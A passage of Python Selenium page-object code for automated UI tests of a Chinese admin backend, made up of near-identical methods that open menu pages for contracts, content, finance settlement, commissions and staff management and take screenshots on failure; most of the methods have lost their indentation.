        return self._open_tree_link("合约中心", "跟投分配规则", "investment_Allocation_rule")

    def get_link_Dividend_settlement_rule(self):
        """分红结算规则 (dividend settlement rule)."""
        return self._open_tree_link("合约中心", "分红结算规则", "Dividend_settlement_rule")

    # 合约中心 -> 跟投管理 (contract center -> co-investment management)
    def get_link_investment_project_management(self):
        """跟投项目管理 (co-investment project management)."""
        return self._open_tree_link("合约中心", "跟投项目管理", "investment_project_management")

    def get_link_investment_Payment_management(self):
        """跟投支付管理 (co-investment payment management)."""
        return self._open_tree_link("合约中心", "跟投支付管理", "investment_Payment_management")

    def get_link_Transfer_remittance_examine(self):
        """转账汇款审核 (transfer/remittance review)."""
        return self._open_tree_link("合约中心", "转账汇款审核", "Transfer_remittance_examine")

    def get_link_Project_progress_view(self):
        """项目进展查看 (project progress view)."""
        return self._open_tree_link("合约中心", "项目进展查看", "Project_progress_view")

    def get_link_Project_liquidation(self):
        """项目清算管理 (project liquidation management)."""
        return self._open_tree_link("合约中心", "项目清算管理", "Project_liquidation")

    def get_link_investment_Income_record(self):
        """跟投收益记录 (co-investment income record)."""
        return self._open_tree_link("合约中心", "跟投收益记录", "investment_Income_record")

    # 内容中心 -> 内容配置 (content center -> content configuration)
    def get_link_Homepage_Bullet_Window(self):
        """首页弹窗管理 (homepage popup management)."""
        return self._open_tree_link("内容中心", "首页弹窗管理", "Homepage_Bullet_Window")
def get_link_Poster_Configuration(self):
"""
海报配置
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("内容中心", "海报配置")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Poster_Configuration(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Live_Course_Management(self):
"""
直播课程管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("内容中心", "直播课程管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Live_Course_Management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Announcement_config(self):
"""
管家端公告配置
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("内容中心", "管家端公告配置")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Announcement_config(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Flash_screen_advertising(self):
"""
闪屏广告
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("内容中心", "闪屏广告")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Flash_screen_advertising(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 内容中心 -- 资讯反馈
def get_link_Topic_Page_Management(self):
"""
专题页配置
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("内容中心", "专题页配置")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Topic_Page_Management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 交易中心 -- 客户管理
def get_link_Customer_List(self):
"""
客户列表
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("交易中心", "客户列表")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Customer_List(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 交易中心 -- 用户管理
def get_link_User_List(self):
"""
用户列表
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("交易中心", "用户列表")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.User_List(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 财务结算 -- 支付板块
def get_link_Transfer_accounts_examine(self):
"""
转账审核
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "转账审核")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Transfer_accounts_examine(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 财务结算 -- 业绩管理
def get_link_Transaction_commission(self):
"""
交易及佣金
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "交易及佣金")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Transaction_commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Payment_confirmation(self):
"""
回款确认
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "回款确认")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Payment_confirmation(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 财务结算 -- 佣金审核
def get_link_Broker_rewards(self):
"""
经纪人奖励
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "经纪人奖励")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Broker_rewards(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Broker_Commission(self):
"""
经纪人结佣
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "经纪人结佣")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Broker_Commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Broker_company_Commission(self):
"""
经纪公司结佣
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "经纪公司结佣")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Broker_company_Commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_network_pusher_Commission(self):
"""
网络推客结佣
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "网络推客结佣")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.network_pusher_Commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 财务结算 -- 奖励管理
def get_link_shop_card_Commission(self):
"""
购物卡结佣
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "购物卡结佣")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.shop_card_Commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_shop_card_category(self):
"""
购物卡类别
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "购物卡类别")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.shop_card_category(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_shop_card_Stock(self):
"""
购物卡库存
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "购物卡库存")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.shop_card_Stock(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_shop_card_query(self):
"""
购物卡查询
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "购物卡查询")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.shop_card_query(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_shop_card_send(self):
"""
购物卡发货
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "购物卡发货")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.shop_card_send(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 财务结算 -- 返还支出
def get_link_Refund_inquiry(self):
"""
返还款查询
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "返还款查询")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Refund_inquiry(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Refund_payment(self):
"""
返还款支付
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "返还款支付")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Refund_payment(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 财务结算 -- 团奖结算
def get_link_Group_award_statement(self):
"""
团奖结算表
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "团奖结算表")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Group_award_statement(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Group_award_application(self):
"""
团奖申请
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "团奖申请")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Group_award_application(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Group_award_Finance(self):
"""
团奖申请-财务
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "团奖申请-财务")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Group_award_Finance(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 财务结算 -- 结算支付
def get_link_List_pending_payments(self):
"""
待支付清单
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "待支付清单")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.List_pending_payments(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Payment_List_Query(self):
"""
支付清单查询
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "支付清单查询")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Payment_List_Query(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Settlement_Inquiry(self):
"""
结算查询
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "结算查询")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Settlement_Inquiry(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Payment_settings(self):
"""
支付设置
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("财务结算", "支付设置")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Payment_settings(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 员工结算 -- 分佣设置
def get_link_Cooperative_Label_Management(self):
"""
合作标签管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "合作标签管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Cooperative_Label_Management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Project_Commission_management(self):
"""
项目分佣管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "项目分佣管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Project_Commission_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Project_Level_Management(self):
"""
项目等级管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "项目等级管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Project_Level_Management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Project_Commission_Detail(self):
"""
项目分佣比例明细
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "项目分佣比例明细")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Project_Commission_Detail(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 员工结算 -- 员工管理
def get_link_Departmental_management(self):
"""
部门管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "部门管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Departmental_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Business_Line_Management(self):
"""
业务线管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "业务线管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Business_Line_Management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Post_management(self):
"""
岗位管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "岗位管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Post_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Employee_management(self):
"""
员工管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "员工管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Employee_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 员工结算 -- 结算标准
def get_link_Section_standard_setting(self):
"""
区间标准设置
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "区间标准设置")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Section_standard_setting(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Transaction_settlement_standard(self):
"""
成交结算标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "成交结算标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Transaction_settlement_standard(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Revenue_settlement_standard(self):
"""
营收结算标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "营收结算标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Revenue_settlement_standard(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Profit_settlement_standard(self):
"""
利润结算标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "利润结算标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Profit_settlement_standard(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Profit_standard_setting(self):
"""
利润标准设置
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "利润标准设置")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Profit_standard_setting(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Market_settlement_standard(self):
"""
市场结算标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "市场结算标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Market_settlement_standard(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 员工结算 -- 计提标准
def get_link_commission_standard(self):
"""
交易佣金标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "交易佣金标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.commission_standard(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Performance_incentive(self):
"""
业绩激励标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "业绩激励标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Performance_incentive(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Profit_incentive(self):
"""
利润激励标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "利润激励标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Profit_incentive(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Market_Commission_Standard(self):
"""
市场佣金标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "市场佣金标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Market_Commission_Standard(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 员工结算 -- 业绩结算
def get_link_Transaction_Settlement(self):
"""
成交结算
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "成交结算")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Transaction_Settlement(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Revenue_Settlement_Month(self):
"""
营收结算-月
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "营收结算-月")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Revenue_Settlement_Month(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Revenue_Settlement_Year(self):
"""
营收结算-年
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "营收结算-年")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Revenue_Settlement_Year(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Profit_Settlement(self):
"""
利润结算
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "利润结算")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Profit_Settlement(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Market_Settlement(self):
"""
市场结算
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "市场结算")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Market_Settlement(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 员工结算 -- 内部激励
def get_link_employee_Commission_Summary(self):
"""
员工佣金发放总表
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "员工佣金发放总表")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.employee_Commission_Summary(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Market_Commission(self):
"""
市场佣金
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "市场佣金")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Market_Commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Trading_Commission(self):
"""
交易佣金
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "交易佣金")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Trading_Commission(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Employee_motivation_Month(self):
"""
员工激励-月
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "员工激励-月")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Employee_motivation_Month(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Employee_motivation_Year(self):
"""
员工激励-年
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "员工激励-年")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Employee_motivation_Year(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Profit_incentive_Year(self):
"""
利润激励-年
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "利润激励-年")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Profit_incentive_Year(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 员工结算 -- 报表查询
def get_link_Employee_Commission_Report_Query(self):
"""
员工分佣报表查询
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("员工结算", "员工分佣报表查询")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Employee_Commission_Report_Query(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 数据中心 -- 数据汇总
def get_link_Channel_Commission(self):
"""
渠道佣金
:return:
"""
# 获取XML中相关信息
